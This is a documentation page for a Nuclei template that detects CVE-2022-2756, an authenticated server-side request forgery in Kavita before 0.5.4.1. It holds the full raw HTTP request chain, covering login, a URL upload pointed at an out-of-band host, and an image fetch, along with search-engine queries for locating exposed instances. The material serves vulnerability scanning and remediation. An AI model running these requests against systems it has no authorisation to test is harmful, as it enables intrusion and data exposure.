Skip to content
Nuclei Templates

Kavita <0.5.4.1 - Server-Side Request Forgery

ID: CVE-2022-2756

Severity: medium

Author: theamanrawat

Tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader

Description

Section titled “Description”

Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-2756


info:
  name: Kavita <0.5.4.1 - Server-Side Request Forgery
  author: theamanrawat
  severity: medium
  description: |
    Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks.
  remediation: Fixed in 0.5.4.1.
  reference:
    - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/
    - https://github.com/kareadita/kavita
    - https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2756
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-2756
    cwe-id: CWE-918
    epss-score: 0.01579
    epss-percentile: 0.87037
    cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: kavitareader
    product: kavita
    shodan-query:
      - title:"kavita"
      - http.title:"kavita"
    fofa-query: title="kavita"
    google-query: intitle:"kavita"
  tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader


http:
  - raw:
      - |
        POST /api/account/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json


        {"username":"{{username}}","password":"{{password}}"}
      - |
        POST /api/upload/upload-by-url HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Authorization: Bearer {{token}}
        Content-Type: application/json


        {"url":"http://oast.me/#.png"}
      - |
        GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - Interactsh Server


      - type: word
        part: header
        words:
          - image/png


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - '"token":"(.*?)"'
        internal: true


      - type: regex
        name: filename
        group: 1
        regex:
          - coverupload.(.*?).png
        internal: true
# digest: 4b0a00483046022100dfa862ed7c2fd3b3556bbbc415ee02f8c6ee4b6b50e26a80d302d19b7219a2160221008275f57ca980de7a866b59c1ddb7bd4b461838f00eb22713c66231a1d73b60f2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2756.yaml"

View on Github